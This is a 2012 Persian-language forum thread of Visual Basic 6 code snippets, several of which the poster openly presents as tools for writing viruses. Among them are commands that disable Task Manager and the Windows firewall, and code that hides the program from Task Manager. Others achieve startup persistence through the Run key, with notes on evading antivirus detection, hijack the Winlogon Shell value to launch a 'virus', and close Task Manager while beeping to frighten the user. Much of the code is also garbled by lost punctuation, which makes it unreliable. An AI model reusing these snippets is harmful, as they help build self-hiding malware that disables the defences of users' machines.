مجموعه ای از بهترین کد های بدرد بخور ویژوال بیسیک
#1
Note 
با سلام امروز می خوام مجموعه ای از کد های بد خور رو بزارم که تو وب زیاد هستند ولی همشون یک جا نیستن

امیدورام خوشتون بیاد:iran flag:

1. گذشتن از روی خطا که خیلی راحت است
کد php:
On Error Resume Next 

توضیح : این کد باعث می شه اگه در اجرای برنامه با مشکل برخورد برنامه متوفق نشه و به دستور بعدی بره (برای تازه کار ها)

2.غیر فعال کردن تسک منیجر ویندوز xp (بیشتر برای ویروس نویسی)

کد php:
Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"vbNormalFocus 
اگر در این کد 1 را به 0 تغییر بدید تسک منیجر فعال می شه


بقیه کد ها رو در پست های بعدی

آخرین ویرایش: 04-07-2012 ساعت 14:49، توسط hamedre81
شاید این جمعه بیاید
پاسخ
#2
Note 
3.گذاشتن شرط برای وجود یک فایل و تشخیص درایو ویندوز

کد php:
Environ("windir")
If 
Dir("\explorer.EXE") = vbNullString Then
 MsgBox 
"not found"
Else
 
MsgBox "Found"
End If 

توضیح"
a = Environ("windir") برای تشخیص درایو ویندوز گذاشتن این کد مقدار c:\windows را بر می گرداند در صورتی که ویندوز شما در درایو c نضب شده باشد

شرط وجود یک فایل هم که معلوم هست4.غیر فعال کردن فایروال ویندوز xp

کد php:
Shell "netsh firewall set opmode disable"vbHide 

برای فعال کردن از کد زیر استفاده می کنن

کد php:
netsh firewall set opmode enable 

بقیه کد ها در پست بعدی

آخرین ویرایش: 04-07-2012 ساعت 09:50، توسط hamedre81
شاید این جمعه بیاید
پاسخ
#3
Note 
5. بستن برنامه ای درحال اجرا

کد php:
Shell "taskkill /f /im " "expl.exe"vbHide 

6.پنهان کردن فرم از دید کاربر و تسک منیجر
کد php:
me.hide
App
.TaskVisible False 


بقیه کد ها در پست بعدی

آخرین ویرایش: 04-07-2012 ساعت 09:52، توسط hamedre81
شاید این جمعه بیاید
پاسخ
#4
Note 
7.قرار دادن برنامه در استارت آپ

من ایجا 2 روش رو می گم :

1.

کد زیر را در ماژول بگذارید
کد php:
Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal _
   hKey 
As LongByVal lpSubKey As StringByVal ulOptions As LongByVal samDesired As LongphkResult As Long) As Long

Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Public Declare Function RegSetValueEx Lib "advapi32.dll" _
   Alias 
"RegSetValueExA" (ByVal hKey As LongByVal lpValueName _
   
As StringByVal Reserved As LongByVal dwType As Long_
   lpData 
As AnyByVal cbData As Long) As Long

Public Const HKEY_CURRENT_USER = &H80000001
Public Const KEY_WRITE = &H20006
Public Const REG_SZ 

بعد کد زیر در فرم بزارید

کد php:
Dim hregkey As Long
   Dim subkey 
As String
   Dim stringbuffer 
As String

   subkey 
"Software\Microsoft\Windows\CurrentVersion\Run"

   
retval RegOpenKeyEx(HKEY_CURRENT_USERsubkey0KEY_WRITEhregkey)
   If 
retval <> 0 Then
      Debug
.Print "Can't open the subkey"
      
Exit Sub
   End 
If
   
stringbuffer App.Path "\" & App.EXEName & ".exe" & vbNullChar
   retval = RegSetValueEx(hregkey, "
My App", 0, REG_SZ, ByVal stringbuffer, Len(stringbuffer))

   RegCloseKey hregkey 

در بیشتر آنتی ویروس ها این کد رو به عنوان ویروس تشخیص می ده

اما روش دوم

کد برای انداختن برنامه از آدرسی دیگر

کد php:
Set reg CreateObject("wscript.shell")
reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & "a", "H:\book1.exe"
Set reg = Nothing 

بجای H:\book1.exe باید آدرس برنامه تون رو بدید
این کد هم توسط ویروس یاب تشخیص داده نمی شه


8. کد ترساندن و اعصاب خود کن
این کد طوری هست که اگر کاربر تسک منیجر ویندوز رو باز کنه صدای بیب داخل کیس شروع به زدن می کنه و کابر رو می ترسونه

اسن کد رو در ماژول کپی کنید

کد php:
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As StringByVal lpWindowName As String) As Long
Private Declare Function SetForegroundWindow Lib "user32" (ByVal hWnd As Long) As Long
Private Declare Function Beep Lib "kernel32" (ByVal dwFreq As LongByVal dwDuration As Long) As Long 

اول یک تایمر درست کنید و مقدار linterval رو برابر با 1 قرار دهید . کد زیر را درونش بزارید

کد php:
handel FindWindow(vbNullString"Windows Task Manager")
If 
handel <> 0 Then
Beep 135
3304
SetForegroundWindow handel
SendKeys 
"%{f4}"1
End 
If 

آخرین ویرایش: 04-07-2012 ساعت 14:57، توسط hamedre81
شاید این جمعه بیاید
پاسخ
#5
Note 
9.Disconnect کردن

کد زیر در یک ماژول قرار دهید

کد php:
Public Const RAS_MAXENTRYNAME As Integer 256
Public Const RAS_MAXDEVICETYPE As Integer 16
Public Const RAS_MAXDEVICENAME As Integer 128
Public Const RAS_RASCONNSIZE As Integer 412

Public Type RasEntryName
  dwSize 
As Long
  szEntryName
(RAS_MAXENTRYNAME) As Byte
End Type

Public Type RasConn
  dwSize 
As Long
  hRasConn 
As Long
  szEntryName
(RAS_MAXENTRYNAME) As Byte
  szDeviceType
(RAS_MAXDEVICETYPE) As Byte
  szDeviceName
(RAS_MAXDEVICENAME) As Byte
End Type

Public Declare Function RasEnumConnections Lib _
"rasapi32.dll" Alias "RasEnumConnectionsA" (lpRasConn As _
Any
lpcb As LonglpcConnections As Long) As Long

Public Declare Function RasHangUp Lib "rasapi32.dll" Alias _
"RasHangUpA" (ByVal hRasConn As Long) As Long

Public gstrISPName As String
Public ReturnCode As Long

Public Sub HangUp()
Dim i As Long
Dim lpRasConn
(255) As RasConn
Dim lpcb 
As Long
Dim lpcConnections 
As Long
Dim hRasConn 
As Long
lpRasConn
(0).dwSize RAS_RASCONNSIZE
lpcb 
RAS_MAXENTRYNAME lpRasConn(0).dwSize
lpcConnections 
0
ReturnCode 
RasEnumConnections(lpRasConn(0), lpcb_
lpcConnections
)

If 
ReturnCode ERROR_SUCCESS Then
  
For 0 To lpcConnections 1
  
If Trim(ByteToString(lpRasConn(i).szEntryName)) _
  
Trim(gstrISPNameThen
    hRasConn 
lpRasConn(i).hRasConn
    ReturnCode 
RasHangUp(ByVal hRasConn)
  
End If
  
Next i
End 
If

End Sub

Public Function ByteToString(bytString() As Byte) As String
Dim i 
As Integer
ByteToString 
""
0
While bytString(i) = 0&
ByteToString ByteToString Chr(bytString(i))
1
Wend
End 
Function 

سپس کد زیر رو در یک دکمه قرار دهید

کد php:
HangUp 

10.اجرا برنامه در سیف مد ( مخصصوص کسانی که قصد درست کردن ویروس دران)

مثلا ویروسی می نویسید که در درایو c کپی بشه ، بعد باید به ویروس خود دستورات زیر را اضافه کنید :
کد php:
Set fso CreateObject("scripting.filesystemobject")
file App.Path "\" & App.EXEName & ".exe"
FileCopy file, "
c:start up.exe"
file2 = "
c:start up.exe"
Set Reg = CreateObject("
wscript.shell")
Reg.regwrite "
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonShell","Explorer.exe c:virus.exe
تذکر خیلی مهم:فاصله ی بین explorer.exe و c:\virus.exe باید حتما وجود داشته باشه !

شاید این جمعه بیاید
پاسخ
#6
Note 
11.میانبر درست کردن از برنامه مورد نظر

کد php:
Private Sub Form_Load()
   
Create_ShortCut "آدرس برنامه""محل ذخیره میانبر""اسم میانبر", , 71
End Sub
Sub Create_ShortCut
(ByVal TargetPath As StringByVal ShortCutPath As StringByVal ShortCutname As StringOptional ByVal WorkPath As StringOptional ByVal Window_Style As IntegerOptional ByVal IconNum As Integer)
    
Dim VbsObj As Object
Set VbsObj 
CreateObject("WScript.Shell")
    
Dim MyShortcut As Object
    Set MyShortcut 
VbsObj.CreateShortcut(ShortCutPath "\" & ShortCutname & ".lnk") '"
    
MyShortcut.TargetPath TargetPath
    MyShortcut
.WorkingDirectory WorkPath
    MyShortcut
.WindowStyle Window_Style
    MyShortcut
.IconLocation TargetPath "," IconNum
    MyShortcut
.Save
End Sub 

12.حذف پوشه

کد زیر رو در قسمت جنرال کپی کنید

کد php:
Public Sub DelAll(ByVal DirtoDelete As Variant)

    
Dim FSOFS
    Set FSO 
CreateObject("Scripting.FileSystemObject")
    
FS FSO.DeleteFolder(DirtoDeleteTrue)


End Sub 

بعد کد زیر رو در هر جای که خواستید بزارید(دکمه ,قرم)

کد php:
Call DelAll("G:\New Folder"

شاید این جمعه بیاید
پاسخ
#7
Note 
13. باز و بستن درب CD ROM

اگر ميخواهيد توسط برنامه خود درب CD ROM را باز و بسته كنيد كافيست ابتدا كد زير را در يك ماژول كپي كنيد.

کد php:
Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As StringByVal lpstrReturnString As StringByVal uReturnLength As LongByVal hwndCallback As Long) As Long 

حالا كد زير را در پنجره فرم كپي كنيد.دو دكمه فرمان هم لازم است.
کد php:
Private Sub CMDOPEN_Click ()
mciSendString "Set CDAudio Door Open Wait"0&, 0&, &
End Sub

Private Sub CMDCLOSE_Click ()
mciSendString "Set CDAudio Door Closed Wait"0&, 0&, &
End Sub 


14.

شاید این جمعه بیاید
پاسخ
ایجاد موضوع جدید   پاسخ به موضوع  

موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
Note دانلود نمونه سولات ویژوال بیسیک SOFTAFZAR 1 2,449 18-12-2015 ساعت 11:30
آخرین ارسال: majidvajih
Note ماشین حساب پیشرفته به زبان ویژوال بیسیک SOFTAFZAR 2 4,529 28-01-2015 ساعت 16:36
آخرین ارسال: xMAN
Note space در ویژوال بیسیک 6 شهره 1 773 04-10-2014 ساعت 10:42
آخرین ارسال: Comodo
Note ویژوال بیسیک amir7519 1 688 19-07-2014 ساعت 17:36
آخرین ارسال: C0der
Note باز و بستن برنامه ها با ویژوال بیسیک Somi 1 722 18-05-2014 ساعت 19:28
آخرین ارسال: VBProgrammer
Note ایجاد لوزی با ویژوال بیسیک 6 Nastaran 2 845 07-04-2014 ساعت 14:25
آخرین ارسال: Nastaran
Note کمک در Sendkey ویژوال بیسیک THE KNIGHT 11 2,394 29-03-2014 ساعت 09:44
آخرین ارسال: Stack OverFlow
Note دانلود مجموعه پروژه ویژوال بیسیک Daniel 0 726 14-03-2014 ساعت 22:37
آخرین ارسال: Daniel
Note تمرینات حل شده درس برنامه سازی(ویژوال بیسیک) Daniel 0 1,239 13-03-2014 ساعت 19:32
آخرین ارسال: Daniel
Note دانلود 105 پروژه ویژوال بیسیک SOFTAFZAR 6 4,916 23-02-2014 ساعت 18:21
آخرین ارسال: Daniel

کاربرانِ درحال بازدید از این موضوع:   1 مهمان